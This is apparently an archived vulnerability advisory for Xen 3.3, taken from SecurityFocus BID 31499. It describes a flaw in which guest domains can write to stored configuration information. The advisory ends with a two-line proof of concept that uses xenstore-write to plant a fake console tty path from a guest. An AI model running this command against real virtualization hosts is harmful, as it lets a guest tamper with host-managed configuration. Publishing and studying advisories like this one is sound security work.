10 lines
442 B
Text
Executable file
10 lines
442 B
Text
Executable file
source: http://www.securityfocus.com/bid/31499/info
|
|
|
|
Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains.
|
|
|
|
UPDATE (December 19, 2008): The initial proposed patches did not resolve this issue.
|
|
|
|
Xen 3.3 is vulnerable; other versions may also be affected.
|
|
|
|
#yum install xen
|
|
# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest
|